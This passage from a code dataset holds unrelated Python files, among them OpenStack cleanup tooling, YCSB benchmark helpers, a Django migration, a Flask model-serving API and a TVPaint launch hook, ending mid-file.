'symbol': asset['symbol'],\n 'price': price\n })\n notify_trades(trades, overall_side)\n execute_trades(select_unexecuted_trades())\n close_database()\n\ndef execute_trades(trades):\n \"\"\"\n Execute trades\n \"\"\"\n for trade in trades:\n if trade['exchange'] == 'bitflyer':\n is_executed = bitflyer_trade({\n 'key': trade['api']['bitflyer_api_key'],\n 'secret': trade['api']['bitflyer_api_secret']\n }, trade['symbol'], trade['type'], trade['side'], trade['amount'])\n if is_executed:\n update_trade(trade['id'])\n else:\n update_trade(trade['id'])\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"exchain/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"27076878","text":"import metapy\n\nidx = metapy.index.make_inverted_index('temp.toml')\nranker = metapy.index.OkapiBM25(k1=1.2,b=0.75,k3=500.0)\nquery = metapy.index.Document()\nev = metapy.index.IREval('temp.toml')\n\nnum_results = 10\nwith open('data/apnews-queries.txt') as query_file:\n for query_num, line in enumerate(query_file):\n query.content(line.strip())\n results = ranker.score(idx, query, num_results)\n avg_p = ev.avg_p(results, query_num, num_results)\n print(\"Query {} average precision: {}\".format(query_num + 1, avg_p))\nprint(ev.map())\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"170383659","text":"#!/usr/bin/env python\n# Copyright 2017 Cisco Systems, Inc. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\nimport sys\nimport time\n\nfrom neutronclient.neutron import client as nclient\nfrom novaclient.client import Client\nfrom novaclient.exceptions import NotFound\nfrom tabulate import tabulate\n\nimport credentials as credentials\nfrom log import LOG\n\nclass ComputeCleaner(object):\n \"\"\"A cleaner for compute resources.\"\"\"\n\n def __init__(self, nova_client, instance_prefix):\n self.nova_client = nova_client\n LOG.info('Discovering instances %s...', instance_prefix)\n all_servers = self.nova_client.servers.list()\n self.servers = [server for server in all_servers\n if server.name.startswith(instance_prefix)]\n\n def instance_exists(self, server):\n try:\n self.nova_client.servers.get(server.id)\n except NotFound:\n return False\n return True\n\n def get_resource_list(self):\n return [[\"Instance\", server.name, server.id] for server in self.servers]\n\n def clean(self):\n if self.servers:\n for server in self.servers:\n try:\n LOG.info('Deleting instance %s...', server.name)\n self.nova_client.servers.delete(server.id)\n except Exception:\n LOG.exception(\"Instance %s deletion failed\", server.name)\n LOG.info(' Waiting for %d instances to be fully deleted...', len(self.servers))\n retry_count = 15 + len(self.servers) * 5\n while True:\n retry_count -= 1\n self.servers = [server for server in self.servers if self.instance_exists(server)]\n if not self.servers:\n break\n\n if retry_count:\n LOG.info(' %d yet to be deleted by Nova, retries left=%d...',\n len(self.servers), retry_count)\n time.sleep(2)\n else:\n LOG.warning(' instance deletion verification time-out: %d still not deleted',\n len(self.servers))\n break\n\n\nclass NetworkCleaner(object):\n \"\"\"A cleaner for network resources.\"\"\"\n\n def __init__(self, neutron_client, network_name_prefixes):\n self.neutron_client = neutron_client\n LOG.info('Discovering networks...')\n all_networks = self.neutron_client.list_networks()['networks']\n self.networks = []\n net_ids = []\n for net in all_networks:\n netname = net['name']\n for prefix in network_name_prefixes:\n if netname.startswith(prefix):\n self.networks.append(net)\n net_ids.append(net['id'])\n break\n if net_ids:\n LOG.info('Discovering ports...')\n all_ports = self.neutron_client.list_ports()['ports']\n self.ports = [port for port in all_ports if port['network_id'] in net_ids]\n else:\n self.ports = []\n\n def get_resource_list(self):\n res_list = [[\"Network\", net['name'], net['id']] for net in self.networks]\n res_list.extend([[\"Port\", port['name'], port['id']] for port in self.ports])\n return res_list\n\n def clean(self):\n for port in self.ports:\n LOG.info(\"Deleting port %s...\", port['id'])\n try:\n self.neutron_client.delete_port(port['id'])\n except Exception:\n LOG.exception(\"Port deletion failed\")\n\n for net in self.networks:\n LOG.info(\"Deleting network %s...\", net['name'])\n try:\n self.neutron_client.delete_network(net['id'])\n except Exception:\n LOG.exception(\"Network deletion failed\")\n\nclass FlavorCleaner(object):\n \"\"\"Cleaner for NFVbench flavor.\"\"\"\n\n def __init__(self, nova_client, name):\n self.name = name\n LOG.info('Discovering flavor %s...', name)\n try:\n self.flavor = nova_client.flavors.find(name=name)\n except NotFound:\n self.flavor = None\n\n def get_resource_list(self):\n if self.flavor:\n return [['Flavor', self.name, self.flavor.id]]\n return None\n\n def clean(self):\n if self.flavor:\n LOG.info(\"Deleting 
flavor %s...\", self.flavor.name)\n try:\n self.flavor.delete()\n except Exception:\n LOG.exception(\"Flavor deletion failed\")\n\nclass Cleaner(object):\n \"\"\"Cleaner for all NFVbench resources.\"\"\"\n\n def __init__(self, config):\n cred = credentials.Credentials(config.openrc_file, None, False)\n session = cred.get_session()\n self.neutron_client = nclient.Client('2.0', session=session)\n self.nova_client = Client(2, session=session)\n network_names = [inet['name'] for inet in config.internal_networks.values()]\n self.cleaners = [ComputeCleaner(self.nova_client, config.loop_vm_name),\n FlavorCleaner(self.nova_client, config.flavor_type),\n NetworkCleaner(self.neutron_client, network_names)]\n\n def show_resources(self):\n \"\"\"Show all NFVbench resources.\"\"\"\n table = [[\"Type\", \"Name\", \"UUID\"]]\n for cleaner in self.cleaners:\n res_list = cleaner.get_resource_list()\n if res_list:\n table.extend(res_list)\n count = len(table) - 1\n if count:\n LOG.info('Discovered %d NFVbench resources:\\n%s', count,\n tabulate(table, headers=\"firstrow\", tablefmt=\"psql\"))\n else:\n LOG.info('No matching NFVbench resources found')\n return count\n\n def clean(self, prompt):\n \"\"\"Clean all resources.\"\"\"\n LOG.info(\"NFVbench will delete all resources shown...\")\n if prompt:\n answer = raw_input(\"Are you sure? (y/n) \")\n if answer.lower() != 'y':\n LOG.info(\"Exiting without deleting any resource\")\n sys.exit(0)\n for cleaner in self.cleaners:\n cleaner.clean()\n","sub_path":"nfvbench/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":6700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"255497795","text":"import subprocess;\nimport math\n\nfrom util.ycsbCommands.Commands import getLoadCommand;\nfrom util.ycsbCommands.Commands import getRunCommand;\nfrom util.util import checkExitCodeOfProcess;\n\nclass Cluster(object):\n \n def __init__(self, normalBinding, consistencyBinding, nodesInCluster):\n self.__normalbinding = normalBinding;\n self.__consistencyBinding = consistencyBinding;\n self.__nodesInCluster = nodesInCluster;\n \n def getNormalBinding(self):\n return self.__normalbinding;\n \n def getConsistencyBinding(self):\n return self.__consistencyBinding;\n \n def getNodesInCluster(self):\n return list(self.__nodesInCluster);\n \n # Should be overriden in subclasses\n def deleteDataInCluster(self):\n pass;\n \n def writeNormalWorkloadFile(self, remoteYcsbNodes, pathForWorkloadFile):\n dataToWrite = 'recordcount=100000\\n' + \\\n 'operationcount=100000000\\n' + \\\n \"\"\"workload=com.yahoo.ycsb.workloads.CoreWorkload\n \nreadallfields=true\n \nreadproportion=0.4\nupdateproportion=0.25\nscanproportion=0.1\ninsertproportion=0.25\n\nscanlengthdistribution=uniform\nmaxscanlength=100\n \nrequestdistribution=zipfian\n\nhosts=\"\"\" + \",\".join(self.getNodesInCluster());\n self.writeFileToYcsbNodes(dataToWrite, remoteYcsbNodes, pathForWorkloadFile, pathForWorkloadFile);\n\n def writeConsistencyWorkloadFile(self, remoteYcsbNodes, pathForWorkloadFile):\n dataToWrite = 
\"\"\"recordcount=100000\noperationcount=100000000\nworkload=com.yahoo.ycsb.workloads.CoreWorkload\n\nreadallfields=true\n\nreadproportion=0.4\nupdateproportion=0.25\nscanproportion=0.1\ninsertproportion=0.25\n\nscanlengthdistribution=uniform\nmaxscanlength=100\n\nrequestdistribution=zipfian\n\nstarttime=10000\n\nconsistencyTest=True\n\nuseFixedOperationDistributionSeed=True\noperationDistributionSeed=46732463246\n\nreadProportionConsistencyCheck=0.5\nupdateProportionConsistencyCheck=0.5\n\nhosts=\"\"\" + \",\".join(self.getNodesInCluster());\n self.writeFileToYcsbNodes(dataToWrite, remoteYcsbNodes, pathForWorkloadFile, pathForWorkloadFile);\n\n def writeFileToYcsbNodes(self, dataToWrite, remoteYcsbNodes, localPath, remotePath):\n f = open(localPath, \"w\");\n f.write(dataToWrite);\n f.close();\n for ip in remoteYcsbNodes:\n exitCode = subprocess.call(['scp', localPath, 'root@' + ip + ':' + remotePath]);\n checkExitCodeOfProcess(exitCode, 'Writing workload file to remote YCSB nodes failed');\n\n def getLoadCommand(self, pathToWorkloadFile, extraParameters = []):\n return getLoadCommand(self.getNormalBinding(), pathToWorkloadFile, extraParameters);\n\n def getRunCommand(self, pathToWorkloadFile, runtimeBenchmarkInMinutes, amountOfThreads, extraParameters = []):\n return getRunCommand(self.getNormalBinding(), pathToWorkloadFile, runtimeBenchmarkInMinutes, amountOfThreads, extraParameters);\n\n def getConsistencyRunCommand(self, pathToWorkloadFile, pathConsistencyResult, runtimeBenchmarkInMinutes,\n workloadThreads, outputFile, requestPeriod, seedForOperationSelection,\n accuracyInMicros, maxDelayBeforeDrop, stopOnFirstConsistency, cluster,\n targetThroughput, pathRawInsertData, pathRawUpdateData, delayToWriterThreadInMicros, extraParameters = []):\n extraParameters = self.addDbSpecificConsistencyBenchmarkParams(extraParameters)\n extraParameters.extend(['-p', 'insertMatrixDelayExportFile=' + outputFile + '_insertDelay'])\n extraParameters.extend(['-p', 'updateMatrixDelayExportFile=' + outputFile + '_updateDelay'])\n extraParameters.extend(['-p', 'insertMatrixNbOfChangesExportFile=' + outputFile + '_insertNbOfChanges'])\n extraParameters.extend(['-p', 'updateMatrixNbOfChangesExportFile=' + outputFile + '_updateNbOfChanges'])\n extraParameters.extend(['-p', 'insertMatrixRawExportFile=' + pathRawInsertData])\n extraParameters.extend(['-p', 'updateMatrixRawExportFile=' + pathRawUpdateData])\n extraParameters.extend(['-p', 'newrequestperiodMillis=' + str(requestPeriod)])\n extraParameters.extend(['-p', 'timeoutConsistencyBeforeDropInMicros=100000000']) # neglect field\n extraParameters.extend([\"-p\", \"useFixedOperationDistributionSeed=True\"])\n extraParameters.extend([\"-p\", \"operationDistributionSeed=\" + seedForOperationSelection])\n extraParameters.extend([\"-p\", \"accuracyInMicros=\" + str(accuracyInMicros)])\n extraParameters.extend([\"-p\", \"delayToWriterThread=\" + str(delayToWriterThreadInMicros)])\n if(maxDelayBeforeDrop > 0):\n extraParameters.extend(['-p', 'maxDelayConsistencyBeforeDropInMicros=' + str(maxDelayBeforeDrop)])\n extraParameters.extend(['-p', 'stopOnFirstConsistency=' + str(stopOnFirstConsistency)])\n # The first IP is the default of the database library\n # The second IP will be used for for write data is the consistency tests\n # This makes the database library use a different node for write and read operations\n extraParameters.extend(['-p', 'writenode=' + cluster.getNodesInCluster()[1]])\n if targetThroughput is not None:\n targetThroughputLoadThreads = 
self._getTargetThroughputLoadThreads(requestPeriod, targetThroughput)\n if targetThroughputLoadThreads > 0:\n extraParameters.extend(['-p', 'addSeparateWorkload=True'])\n extraParameters.extend(['-threads', str(workloadThreads)])\n extraParameters.extend(['-target', str(targetThroughputLoadThreads)])\n else:\n extraParameters.extend(['-p', 'addSeparateWorkload=False'])\n extraParameters.extend(['-threads', \"1\"])\n extraParameters.extend(['-p', 'resultfile=' + pathConsistencyResult])\n return getRunCommand(self.getConsistencyBinding(), pathToWorkloadFile, runtimeBenchmarkInMinutes,\n str(workloadThreads), extraParameters)\n\n def addDbSpecificConsistencyBenchmarkParams(self, paramList):\n return paramList\n\n def _getTargetThroughputLoadThreads(self, requestPeriodInMillis, targetThroughput):\n throughputNonLoadThreads = self._getThroughputProducedByNonLoadThreads(requestPeriodInMillis)\n return max(targetThroughput - throughputNonLoadThreads, 0)\n\n def _getThroughputProducedByNonLoadThreads(self, requestPeriodInMillis):\n requestPeriodsPerSecond = (1000/requestPeriodInMillis)\n return math.floor(2*requestPeriodsPerSecond) # 1 write thread + 1 read thread\n\n def removeNode(self, ipNodeToRemove):\n result = self.doRemoveNode(ipNodeToRemove);\n self.__nodesInCluster.remove(ipNodeToRemove);\n return result;\n\n def addNode(self, ipNodeToAdd):\n self.doAddNode(ipNodeToAdd);\n self.__nodesInCluster.append(ipNodeToAdd);\n \n # Should be overriden in subclasses\n def stopNode(self, ipNodeToStop):\n pass;\n\n # Should be overriden in subclasses\n def startNode(self, ipNodeToStart):\n pass;\n \n def getOtherIpInCluster(self, ip):\n for otherIp in self.__nodesInCluster:\n if otherIp != ip:\n return otherIp;\n raise Exception('No other ip found in cluster')\n","sub_path":"front_end/cluster/Cluster.py","file_name":"Cluster.py","file_ext":"py","file_size_in_byte":7296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"430108276","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('items', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='InventoryItem',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('quantity', models.IntegerField(default=1)),\n ('equipped', models.BooleanField(default=False)),\n ('acquire_date', models.DateTimeField(auto_now_add=True)),\n ('item', models.ForeignKey(to='items.Item')),\n ],\n ),\n migrations.CreateModel(\n name='Profile',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('username', models.CharField(help_text='Required. 55 characters or fewer. 
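The target-throughput helpers in the Cluster record above reduce to simple arithmetic: the dedicated read and write consistency threads already issue floor(2 * 1000 / requestPeriodInMillis) operations per second, and the separate load workload is throttled to whatever remains of the target. Worked through with illustrative values (standard library only; the function name is not from the record):

import math

def load_thread_target(request_period_ms, target_throughput):
    # ops/s already produced by the 1 reader + 1 writer consistency threads
    background = math.floor(2 * (1000 / request_period_ms))
    return max(target_throughput - background, 0)

assert load_thread_target(100, 100) == 80  # 20 ops/s of background traffic leaves 80 for the load threads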
Letters, digits, -, _, and spaces only.', unique=True, max_length=55, verbose_name='username', validators=[django.core.validators.RegexValidator(b'^[\\\\w\\\\s_ -]+$', 'Enter a valid username.', b'invalid')])),\n ('gold', models.IntegerField(default=0)),\n ('ooc_description', models.TextField(blank=True)),\n ('ooc_dob', models.DateField(null=True, blank=True)),\n ('ooc_gender', models.CharField(max_length=11, choices=[(b'Male', b'Male'), (b'Female', b'Female'), (b'Unspecified', b'Unspecified')])),\n ('ooc_country', models.CharField(max_length=255, null=True, blank=True)),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('last_online', models.DateTimeField(auto_now=True)),\n ('ooc_word_count', models.IntegerField(default=0)),\n ('hidden', models.BooleanField(default=False)),\n ('avatar', models.ImageField(null=True, upload_to=b'media/uploads/%Y/%m/%d', blank=True)),\n ('notify_replies', models.BooleanField(default=True)),\n ('notify_pm', models.BooleanField(default=True)),\n ('pop_up_pm', models.BooleanField(default=False)),\n ('disable_system_messages', models.BooleanField(default=False)),\n ('disable_signature_images', models.BooleanField(default=False)),\n ('hide_donations', models.BooleanField(default=False)),\n ('description', models.TextField(blank=True)),\n ('signature', models.TextField(blank=True)),\n ('character_name', models.CharField(max_length=150)),\n ('character_age', models.CharField(max_length=25)),\n ('character_race', models.CharField(max_length=150)),\n ('character_gender', models.CharField(default=b'Unspecified', max_length=10, choices=[(b'Male', b'Male'), (b'Female', b'Female'), (b'Unspecified', b'Unspecified')])),\n ('alignment', models.CharField(max_length=2, choices=[(b'LG', b'Lawful Good'), (b'TG', b'True Good'), (b'CG', b'Chaotic Good'), (b'LN', b'Lawful Neutral'), (b'TN', b'True Neutral'), (b'CN', b'Chaotic Neutral'), (b'LE', b'Lawful Evil'), (b'TE', b'True Evil'), (b'CE', b'Chaotic Evil')])),\n ('class_desc', models.CharField(max_length=150)),\n ('word_count', models.IntegerField(default=0)),\n ('longest_post', models.IntegerField(default=0)),\n ('views', models.IntegerField(default=0)),\n ('updated', models.DateTimeField(auto_now=True)),\n ('items', models.ManyToManyField(to='account.InventoryItem', blank=True)),\n ('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ['created'],\n },\n ),\n ]\n","sub_path":"apps/account/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"118199686","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\n'''\nDid it run on leetcode: yes\nDid you face any problem: How to add new element into heap after we add it our sorted list\n\nTime Complexity: 0(N)\nSpace Complexity: 0(K)\n\nAlgorithm:\n- create a min heap which will contain all heads of the list's to be merged.\n- create a dummy head\n- while the queue is not empty:\n - get the minimum from heap and point dummy head to this minimum element\n - add the next element into the heap which is pointed by the popped element\n from the min heap\n- increment the dummy head to its next pointer\n- Now you have merged K sorted lists\n\n'''\n\nimport heapq\n\nclass Solution(object):\n def mergeKLists(self, lists):\n \"\"\"\n :type lists: List[ListNode]\n :rtype: ListNode\n \"\"\"\n heap = []\n \n for 
(index,listHead) in enumerate(lists):\n if listHead:\n heap.append((listHead.val,index))\n \n heapq.heapify(heap)\n head = ListNode(0)\n temp = head\n \n while heap:\n poppedHead,listIndex = heapq.heappop(heap)\n temp.next = lists[listIndex]\n temp = temp.next\n lists[listIndex] = lists[listIndex].next\n if lists[listIndex]:\n heapq.heappush(heap,(lists[listIndex].val,listIndex))\n \n return head.next","sub_path":"merge-k-sorted-lists.py","file_name":"merge-k-sorted-lists.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"514591148","text":"# import Flask class from the flask module\r\nfrom flask import Flask, request\r\n\r\nimport numpy as np\r\nimport pickle\r\nimport os\r\nimport sys\r\n\r\n# Create Flask object to run\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef home():\r\n return \"Hi, Welcome to zeno API , where Machine Learning models comes alive ^__^b \"\r\n\r\n@app.route('/predict')\r\ndef predict():\r\n # Get values from browser\r\n age = request.args['age']\r\n mp = request.args['menopause']\r\n tumor=request.args['tumor-size']\r\n inv=request.args['inv-nodes']\r\n caps=request.args['node-caps']\r\n deg=request.args['deg-malig']\r\n b=request.args['breast']\r\n bq=request.args['breast-quad']\r\n irr=request.args['irradiat']\r\n\r\n \r\n\r\n\t\r\n testData = np.array([age, mp,tumor, inv,caps, deg, b, bq,irr]).reshape(1,9)\r\n class_prediced = int(model.predict(testData)[0])\r\n output = \"age:{} ,menopause :{}, tumor_size:{}, inv_node:{},node_caps:{},deg_malig:{},breast:{},breast_quad:{}, irradiat:{} ,Predicted Class: {} \".format(str(age),str(mp), str(tumor), str(inv),str(caps),str(deg),str(b),str(bq),str(irr), str(class_prediced))\r\n\t\r\n return (output)\r\n\t\r\n# Load the pre-trained and persisted SVM model\r\n# Note: The model will be loaded only once at the start of the server\r\ndef load_model():\r\n global model\r\n\r\n modelFile = open('models/{}_model.pckl'.format(sys.argv[1]), 'rb')\r\n model = pickle.load(modelFile)\r\n modelFile.close()\r\n\r\nif __name__ == \"__main__\":\r\n print(\"**Starting Server...\")\r\n # http://127.0.0.1:5000/predict?age=1&menopause=7&tumor-size=3&inv-nodes=2&node-caps=10°-malig=5&breast=10&breast-quad=5&irradiat=\r\n # one need to supply which model you want to use since there are 6 models \r\n\r\n # Call function that loads Model\r\n load_model()\r\n\t\r\n # Run Server\r\n app.run()\r\n \r\n ","sub_path":"MachineLearningAPI_demoMaker/AZDL_models/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"493131451","text":"# -*- coding:UTF-8 -*-\n\nimport logging\n\nimport tornado.ioloop\nimport tornado.web\nfrom tornado.httpserver import HTTPServer\nfrom tornado.ioloop import IOLoop\n\nfrom push import PushHandler\nfrom settings import SERVER_PORT\n\n_LOGGER = logging.getLogger('weixin')\n\napplication = tornado.web.Application([\n (r'/push', PushHandler),\n])\n\n\ndef serving():\n try:\n server = HTTPServer(application)\n server.bind(SERVER_PORT)\n server.start()\n IOLoop.current().start()\n _LOGGER.info('starting serving.')\n except KeyboardInterrupt:\n IOLoop.current().stop()\n except Exception as err:\n _LOGGER.error('starting failed, exception: %s' % err)\n\n\nif __name__ == '__main__':\n 
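The merge-k-sorted-lists record above pops the global minimum from a heap holding one (value, list-index) entry per list, then pushes that list's successor, so each of the N total nodes costs one push and one pop: O(N log k) time with O(k) heap space (the record's "0(N)"/"0(K)" notes understate the log factor). The same pattern on plain Python lists, standard library only (a sketch, not the record's linked-list version):

import heapq

def merge_k(lists):
    # Seed the heap with the head of every non-empty list.
    heap = [(lst[0], i, 0) for i, lst in enumerate(lists) if lst]
    heapq.heapify(heap)
    merged = []
    while heap:
        value, i, j = heapq.heappop(heap)  # smallest element still unmerged
        merged.append(value)
        if j + 1 < len(lists[i]):          # advance within the source list
            heapq.heappush(heap, (lists[i][j + 1], i, j + 1))
    return merged

assert merge_k([[1, 4], [2, 5], [3]]) == [1, 2, 3, 4, 5]

For plain iterables the standard library already ships this pattern as heapq.merge.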
serving()\n","sub_path":"weixin/src/serving.py","file_name":"serving.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"464037541","text":"from pprint import pprint\nimport sounddevice as SD\nimport numpy as np\n\nclass Packet:\n class freqs:\n start = 5000\n zero = 6000\n one = 7000\n end = 8000\n\n def __init__(self, sample_rate=44100, window_size=2**15):\n self.sound = np.array([])\n self.sample_rate = sample_rate\n self.window_size = window_size\n\n \n def multiply_block(self, block, n):\n out = np.array([])\n for _ in range(n):\n out = np.concatenate((out, block))\n return out\n\n\n def get_block(self, freq):\n return np.array([\n np.sin(np.pi * 2 * x * freq / self.sample_rate) for x in range(self.window_size)\n ])\n\n\n def get_blocks(self, freq, n):\n return self.multiply_block(self.get_block(freq), n)\n\n\n def add_one(self):\n self.sound = np.concatenate((self.sound, self.get_block(self.freqs.one)))\n return self\n \n\n def add_zero(self):\n self.sound = np.concatenate((self.sound, self.get_block(self.freqs.zero)))\n return self\n \n def reset(self):\n self.sound = self.get_blocks(self.freqs.start, 8)\n return self\n\n\n def end(self):\n self.sound = np.concatenate((self.sound, self.get_blocks(self.freqs.end, 8)))\n return self\n\n\n def add_byte(self, byte):\n bits = list(map(int, ('00000000' + bin(byte)[2:])[-8:]))\n for bit in bits:\n if bit:\n self.add_one()\n else:\n self.add_zero()\n return self\n\n \n def play(self):\n SD.play(self.sound, self.sample_rate, blocking=True)\n return self\n\n def send_message(self, message):\n self.reset()\n for char in message:\n self.add_byte(ord(char))\n self.end().play()\n\n\nif __name__ == \"__main__\":\n p = Packet().reset()\n p.add_byte(0b11011011)\n p.add_byte(0b10011001)\n p.end().play()\n\n p.send_message(\"hello\")\n\n\n","sub_path":"remake.py","file_name":"remake.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"119722981","text":"import os\nimport shutil\nimport platform\nimport pype.lib\nfrom pype.api import Anatomy, Logger\nimport getpass\nimport avalon.api\n\n\nclass TvpaintPrelaunchHook(pype.lib.PypeHook):\n \"\"\"\n Workfile preparation hook\n \"\"\"\n host_name = \"tvpaint\"\n\n def __init__(self, logger=None):\n if not logger:\n self.log = Logger().get_logger(self.__class__.__name__)\n else:\n self.log = logger\n\n self.signature = \"( {} )\".format(self.__class__.__name__)\n\n def install_pywin(self):\n if platform.system().lower() != \"windows\":\n return\n\n try:\n from win32com.shell import shell\n except Exception:\n output = pype.lib._subprocess([\"pip\", \"install\", \"pywin32==227\"])\n self.log.info(output)\n\n def execute(self, *args, env: dict = None) -> bool:\n if not env:\n env = os.environ\n\n self.install_pywin()\n\n # get context variables\n project_name = env[\"AVALON_PROJECT\"]\n asset_name = env[\"AVALON_ASSET\"]\n task_name = env[\"AVALON_TASK\"]\n workdir = env[\"AVALON_WORKDIR\"]\n extension = avalon.api.HOST_WORKFILE_EXTENSIONS[self.host_name][0]\n\n # get workfile path\n workfile_path = self.get_anatomy_filled(\n workdir, project_name, asset_name, task_name)\n\n # create workdir if doesn't exist\n os.makedirs(workdir, exist_ok=True)\n self.log.info(f\"Work dir is: `{workdir}`\")\n\n # get last version of workfile\n workfile_last = env.get(\"AVALON_LAST_WORKFILE\")\n self.log.debug(f\"_ workfile_last: 
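The Packet record above is a small frequency-shift-keying scheme: every bit of a byte becomes one fixed-length sine block at the "zero" or "one" tone, framed by "start" and "end" tones. The tone synthesis reduces to the sketch below, assuming only NumPy and reusing the record's frequencies (the helper names are illustrative; no audio output is attempted here):

import numpy as np

SAMPLE_RATE, WINDOW = 44100, 2 ** 15
TONES = {'start': 5000, 'zero': 6000, 'one': 7000, 'end': 8000}

def tone_block(freq):
    # One window of a pure sine at the requested frequency.
    t = np.arange(WINDOW) / SAMPLE_RATE
    return np.sin(2 * np.pi * freq * t)

def encode_byte(byte):
    # MSB-first, as in Packet.add_byte: one tone block per bit.
    bits = [(byte >> k) & 1 for k in range(7, -1, -1)]
    return np.concatenate([tone_block(TONES['one'] if b else TONES['zero']) for b in bits])

signal = np.concatenate([tone_block(TONES['start']), encode_byte(0b11011011), tone_block(TONES['end'])])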
`{workfile_last}`\")\n\n if workfile_last:\n workfile = workfile_last\n workfile_path = os.path.join(workdir, workfile)\n\n # copy workfile from template if doesnt exist any on path\n if not os.path.isfile(workfile_path):\n # try to get path from environment or use default\n # from `pype.hosts.tvpaint` dir\n template_path = env.get(\"TVPAINT_TEMPLATE\") or os.path.join(\n env.get(\"PYPE_MODULE_ROOT\"),\n \"pype/hosts/tvpaint/template.tvpp\"\n )\n\n # try to get template from project config folder\n proj_config_path = os.path.join(\n env[\"PYPE_PROJECT_CONFIGS\"], project_name)\n if os.path.exists(proj_config_path):\n\n template_file = None\n for f in os.listdir(proj_config_path):\n if extension in os.path.splitext(f):\n template_file = f\n\n if template_file:\n template_path = os.path.join(\n proj_config_path, template_file)\n self.log.info(\n f\"Creating workfile from template: `{template_path}`\")\n\n # copy template to new destinantion\n shutil.copy2(\n os.path.normpath(template_path),\n os.path.normpath(workfile_path)\n )\n\n self.log.info(f\"Workfile to open: `{workfile_path}`\")\n\n # adding compulsory environment var for openting file\n env[\"PYPE_TVPAINT_PROJECT_FILE\"] = workfile_path\n\n return True\n\n def get_anatomy_filled(self, workdir, project_name, asset_name, task_name):\n dbcon = avalon.api.AvalonMongoDB()\n dbcon.install()\n dbcon.Session[\"AVALON_PROJECT\"] = project_name\n project_document = dbcon.find_one({\"type\": \"project\"})\n asset_document = dbcon.find_one({\n \"type\": \"asset\",\n \"name\": asset_name\n })\n dbcon.uninstall()\n\n asset_doc_parents = asset_document[\"data\"].get(\"parents\")\n hierarchy = \"/\".join(asset_doc_parents)\n\n data = {\n \"project\": {\n \"name\": project_document[\"name\"],\n \"code\": project_document[\"data\"].get(\"code\")\n },\n \"task\": task_name,\n \"asset\": asset_name,\n \"app\": self.host_name,\n \"hierarchy\": hierarchy\n }\n anatomy = Anatomy(project_name)\n extensions = avalon.api.HOST_WORKFILE_EXTENSIONS[self.host_name]\n file_template = anatomy.templates[\"work\"][\"file\"]\n data.update({\n \"version\": 1,\n \"user\": os.environ.get(\"PYPE_USERNAME\") or getpass.getuser(),\n \"ext\": extensions[0]\n })\n\n return avalon.api.last_workfile(\n workdir, file_template, data, extensions, True\n )\n","sub_path":"pype/hooks/tvpaint/prelaunch.py","file_name":"prelaunch.py","file_ext":"py","file_size_in_byte":4469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"422866639","text":"import numpy as np\nimport tensorflow as tf\nimport time\n\ninput_data = tf.Variable( np.random.rand(1,2000,2000,1), dtype = np.float32 )\nfilter_data = tf.Variable( np.random.rand(8, 8, 1, 8), dtype = np.float32)\ny = tf.nn.conv2d(input_data, filter_data, strides = [1, 1, 1, 1], padding = 'SAME')\n\nwith tf.Session() as sess:\n #result = sess.run(op)#run operation\n sess.run(tf.global_variables_initializer())\n\n for i in range(0,100):\n start = time.perf_counter()\n sess.run(y)\n\n end = time.perf_counter()\n elapsed = end - start\n print(\"elapsed time = {:.12f} seconds\".format(elapsed))\n\n ","sub_path":"ILBPDll/TimeTestOfConv2D/TestConv2d.py","file_name":"TestConv2d.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"192114307","text":"from erebus import client\n\n\nclass Behavior(client.Behavior):\n TURN_SPEED = 3 # rad/s\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, 
